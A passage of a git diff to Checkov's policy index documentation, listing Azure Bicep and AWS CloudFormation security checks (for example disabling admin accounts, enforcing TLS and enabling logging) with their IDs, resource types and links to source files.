+| 129 | CKV_AZURE_135 | resource  | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies           | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell          | Bicep | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py)                                                             |
+| 130 | CKV_AZURE_137 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure ACR admin account is disabled                                                                         | Bicep | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py)                                                                       |
+| 131 | CKV_AZURE_138 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensures that ACR disables anonymous pulling of images                                                        | Bicep | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py)                                                                     |
+| 132 | CKV_AZURE_139 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure ACR set to disable public networking                                                                  | Bicep | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py)                                                         |
+| 133 | CKV_AZURE_140 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure that Local Authentication is disabled on CosmosDB                                                     | Bicep | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py)                                                                   |
+| 134 | CKV_AZURE_141 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS local admin account is disabled                                                                   | Bicep | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py)                                                                           |
+| 135 | CKV_AZURE_145 | resource  | Microsoft.Web/sites                                                          | Ensure Function app is using the latest version of TLS encryption                                            | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                     |
+| 136 | CKV_AZURE_145 | resource  | Microsoft.Web/sites/slots                                                    | Ensure Function app is using the latest version of TLS encryption                                            | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                     |
+| 137 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine does not enable password authentication                                          | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                       |
+| 138 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine does not enable password authentication                                          | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                       |
+| 139 | CKV_AZURE_151 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Windows VM enables encryption                                                                         | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                                           |
+| 140 | CKV_AZURE_153 | resource  | Microsoft.Web/sites                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                 | Bicep | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                       |
+| 141 | CKV_AZURE_153 | resource  | Microsoft.Web/sites/slots                                                    | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                 | Bicep | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                       |
+| 142 | CKV_AZURE_155 | resource  | Microsoft.Web/sites                                                          | Ensure debugging is disabled for the App service slot                                                        | Bicep | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                               |
+| 143 | CKV_AZURE_155 | resource  | Microsoft.Web/sites/slots                                                    | Ensure debugging is disabled for the App service slot                                                        | Bicep | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                               |
+| 144 | CKV_AZURE_157 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                       | Bicep | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py)                                 |
+| 145 | CKV_AZURE_158 | resource  | Microsoft.Databricks/workspaces                                              | Ensure Databricks Workspace data plane to control plane communication happens over private link              | Bicep | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py)                                                         |
+| 146 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that HTTP (port 80) access is restricted from the internet                                            | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                               |
+| 147 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that HTTP (port 80) access is restricted from the internet                                            | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                               |
+| 148 | CKV_AZURE_163 | resource  | Microsoft.ContainerRegistry/registries                                       | Enable vulnerability scanning for container images.                                                          | Bicep | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py)                                                                       |
+| 149 | CKV_AZURE_166 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure container image quarantine, scan, and mark images verified                                            | Bicep | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py)                                                                     |
+| 150 | CKV_AZURE_168 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                          | Bicep | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                   |
+| 151 | CKV_AZURE_168 | resource  | Microsoft.ContainerService/managedClusters/agentPools                        | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                          | Bicep | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                   |
+| 152 | CKV_AZURE_169 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                   | Bicep | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py)                                                                           |
+| 153 | CKV_AZURE_171 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS cluster upgrade channel is chosen                                                                 | Bicep | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py)                                                                                   |
+| 154 | CKV_AZURE_172 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                     | Bicep | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py)                                                                         |
+| 155 | CKV_AZURE_173 | resource  | Microsoft.ApiManagement/service                                              | Ensure API management uses at least TLS 1.2                                                                  | Bicep | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py)                                                                           |
+| 156 | CKV_AZURE_174 | resource  | Microsoft.ApiManagement/service                                              | Ensure API management public access is disabled                                                              | Bicep | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py)                                                                   |
+| 157 | CKV_AZURE_175 | resource  | Microsoft.SignalRService/webPubSub                                           | Ensure Web PubSub uses a SKU with an SLA                                                                     | Bicep | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py)                                                                                             |
+| 158 | CKV_AZURE_176 | resource  | Microsoft.SignalRService/webPubSub                                           | Ensure Web PubSub uses managed identities to access Azure resources                                          | Bicep | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py)                                                                           |
+| 159 | CKV_AZURE_177 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure Windows VM enables automatic updates                                                                  | Bicep | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                           |
+| 160 | CKV_AZURE_177 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Windows VM enables automatic updates                                                                  | Bicep | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                           |
+| 161 | CKV_AZURE_178 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure linux VM enables SSH with keys for secure communication                                               | Bicep | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                         |
+| 162 | CKV_AZURE_178 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure linux VM enables SSH with keys for secure communication                                               | Bicep | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                         |
+| 163 | CKV_AZURE_182 | resource  | Microsoft.Network/networkInterfaces                                          | Ensure that VNET has at least 2 connected DNS Endpoints                                                      | Bicep | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                               |
+| 164 | CKV_AZURE_182 | resource  | Microsoft.Network/virtualNetworks                                            | Ensure that VNET has at least 2 connected DNS Endpoints                                                      | Bicep | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                               |
+| 165 | CKV_AZURE_183 | resource  | Microsoft.Network/virtualNetworks                                            | Ensure that VNET uses local DNS addresses                                                                    | Bicep | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py)                                                                                             |
+| 166 | CKV_AZURE_189 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that Azure Key Vault disables public network access                                                   | Bicep | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py)                                               |
+| 167 | CKV_AZURE_191 | resource  | Microsoft.EventGrid/topics                                                   | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                  | Bicep | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py)                                           |
+| 168 | CKV_AZURE_192 | resource  | Microsoft.EventGrid/topics                                                   | Ensure that Azure Event Grid Topic local Authentication is disabled                                          | Bicep | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py)                                                   |
+| 169 | CKV_AZURE_193 | resource  | Microsoft.EventGrid/topics                                                   | Ensure public network access is disabled for Azure Event Grid Topic                                          | Bicep | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py)                                                               |
+| 170 | CKV_AZURE_206 | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that Storage Accounts use replication                                                                 | Bicep | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py)                                                           |
+| 171 | CKV_AZURE_208 | resource  | Microsoft.Search/searchServices                                              | Ensure that Azure Cognitive Search maintains SLA for index updates                                           | Bicep | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py)                                                                               |
+| 172 | CKV_AZURE_209 | resource  | Microsoft.Search/searchServices                                              | Ensure that Azure Cognitive Search maintains SLA for search index queries                                    | Bicep | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py)                                                                 |
+| 173 | CKV_AZURE_212 | resource  | Microsoft.Web/sites                                                          | Ensure App Service has a minimum number of instances for failover                                            | Bicep | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                   |
+| 174 | CKV_AZURE_212 | resource  | Microsoft.Web/sites/slots                                                    | Ensure App Service has a minimum number of instances for failover                                            | Bicep | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                   |
+| 175 | CKV_AZURE_213 | resource  | Microsoft.Web/sites                                                          | Ensure that App Service configures health check                                                              | Bicep | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                     |
+| 176 | CKV_AZURE_213 | resource  | Microsoft.Web/sites/slots                                                    | Ensure that App Service configures health check                                                              | Bicep | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                     |
+| 177 | CKV_AZURE_216 | resource  | Microsoft.Network/azureFirewalls                                             | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                      | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                                                     |
+| 178 | CKV_AZURE_218 | resource  | Microsoft.Network/applicationGateways                                        | Ensure Application Gateway defines secure protocols for in transit communication                             | Bicep | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py)                                                               |
+| 179 | CKV_AZURE_222 | resource  | Microsoft.Web/sites                                                          | Ensure that Azure Web App public network access is disabled                                                  | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                         |
+| 180 | CKV_AZURE_222 | resource  | Microsoft.Web/sites/config                                                   | Ensure that Azure Web App public network access is disabled                                                  | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                         |
+| 181 | CKV_AZURE_222 | resource  | Microsoft.Web/sites/slots                                                    | Ensure that Azure Web App public network access is disabled                                                  | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                         |
+| 182 | CKV_AZURE_223 | resource  | Microsoft.EventHub/namespaces                                                | Ensure Event Hub Namespace uses at least TLS 1.2                                                             | Bicep | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py)                                                                   |
+| 183 | CKV_AZURE_225 | resource  | Microsoft.Web/serverfarms                                                    | Ensure the App Service Plan is zone redundant                                                                | Bicep | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py)                                                               |
+| 184 | CKV_AZURE_226 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure ephemeral disks are used for OS disks                                                                 | Bicep | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py)                                                                               |
+| 185 | CKV_AZURE_227 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Bicep | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                 |
+| 186 | CKV_AZURE_227 | resource  | Microsoft.ContainerService/managedClusters/agentPools                        | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Bicep | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                 |
+| 187 | CKV_AZURE_229 | resource  | Microsoft.Sql/servers/databases                                              | Ensure the Azure SQL Database Namespace is zone redundant                                                    | Bicep | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py)                                                                     |
+| 188 | CKV_AZURE_233 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure Azure Container Registry (ACR) is zone redundant                                                      | Bicep | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                       |
+| 189 | CKV_AZURE_233 | resource  | Microsoft.ContainerRegistry/registries/replications                          | Ensure Azure Container Registry (ACR) is zone redundant                                                      | Bicep | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                       |
+| 190 | CKV_AZURE_236 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that Cognitive Services accounts disable local authentication                                         | Bicep | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py)                                                     |
+| 191 | CKV_AZURE_238 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that all Azure Cognitive Services accounts are configured with a managed identity                     | Bicep | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py)                                                 |
+| 192 | CKV_AZURE_239 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure Azure Synapse Workspace administrator login password is not exposed                                   | Bicep | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py)                     |
+| 193 | CKV_AZURE_240 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure Azure Synapse Workspace is encrypted with a CMK                                                       | Bicep | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py)                                                           |
+| 194 | CKV_AZURE_242 | resource  | Microsoft.Synapse/workspaces/bigDataPools                                    | Ensure isolated compute is enabled for Synapse Spark pools                                                   | Bicep | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py)                                             |
+| 195 | CKV_AZURE_243 | resource  | Microsoft.MachineLearningServices/workspaces                                 | Ensure Azure Machine learning workspace is configured with private endpoint                                  | Bicep | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py)                                                       |
+| 196 | CKV2_AZURE_19 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                      | Bicep | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py)               |
+| 197 | CKV2_AZURE_27 | resource  | Microsoft.Sql/servers                                                        | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                              | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                                               |
+| 198 | CKV2_AZURE_46 | resource  | Microsoft.Synapse/workspaces/vulnerabilityAssessments                        | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                      | Bicep | [AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py)                                                     |
+| 199 | CKV2_AZURE_48 | resource  | Microsoft.Databricks/workspaces                                              | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption                      | Bicep | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) |
 
 
 ---
diff --git a/docs/5.Policy Index/cloudformation.md b/docs/5.Policy Index/cloudformation.md
index 8c19c436756..36ea47a60a5 100644
--- a/docs/5.Policy Index/cloudformation.md	
+++ b/docs/5.Policy Index/cloudformation.md	
@@ -78,104 +78,118 @@ nav_order: 1
 |  67 | CKV_AWS_76  | resource | AWS::Serverless::Api                      | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py)                                                                 |
 |  68 | CKV_AWS_78  | resource | AWS::CodeBuild::Project                   | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py)                                                           |
 |  69 | CKV_AWS_79  | resource | AWS::EC2::LaunchTemplate                  | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py)                                                                                   |
-|  70 | CKV_AWS_82  | resource | AWS::Athena::WorkGroup                    | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                       |
-|  71 | CKV_AWS_83  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                 |
-|  72 | CKV_AWS_84  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
-|  73 | CKV_AWS_84  | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
-|  74 | CKV_AWS_85  | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py)                                                                                       |
-|  75 | CKV_AWS_86  | resource | AWS::CloudFront::Distribution             | Ensure CloudFront Distribution has Access Logging enabled                                                                                                                                                | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py)                                                     |
-|  76 | CKV_AWS_87  | resource | AWS::Redshift::Cluster                    | Redshift cluster should not be publicly accessible                                                                                                                                                       | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py)                                             |
-|  77 | CKV_AWS_88  | resource | AWS::EC2::Instance                        | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
-|  78 | CKV_AWS_88  | resource | AWS::EC2::LaunchTemplate                  | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
-|  79 | CKV_AWS_89  | resource | AWS::DMS::ReplicationInstance             | DMS replication instance should not be publicly accessible                                                                                                                                               | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                               |
-|  80 | CKV_AWS_90  | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py)                                                                                               |
-|  81 | CKV_AWS_91  | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py)                                                                                 |
-|  82 | CKV_AWS_92  | resource | AWS::ElasticLoadBalancing::LoadBalancer   | Ensure the ELB has access logging enabled                                                                                                                                                                | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py)                                                                                     |
-|  83 | CKV_AWS_94  | resource | AWS::Glue::DataCatalogEncryptionSettings  | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py)                                                             |
-|  84 | CKV_AWS_95  | resource | AWS::ApiGatewayV2::Stage                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
-|  85 | CKV_AWS_95  | resource | AWS::Serverless::HttpApi                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
-|  86 | CKV_AWS_96  | resource | AWS::RDS::DBCluster                       | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py)                                                                               |
-|  87 | CKV_AWS_97  | resource | AWS::ECS::TaskDefinition                  | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                       |
-|  88 | CKV_AWS_99  | resource | AWS::Glue::SecurityConfiguration          | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py)                                                             |
-|  89 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup                       | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                               |
-|  90 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster                   | Ensure Neptune logging is enabled                                                                                                                                                                        | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py)                                                                     |
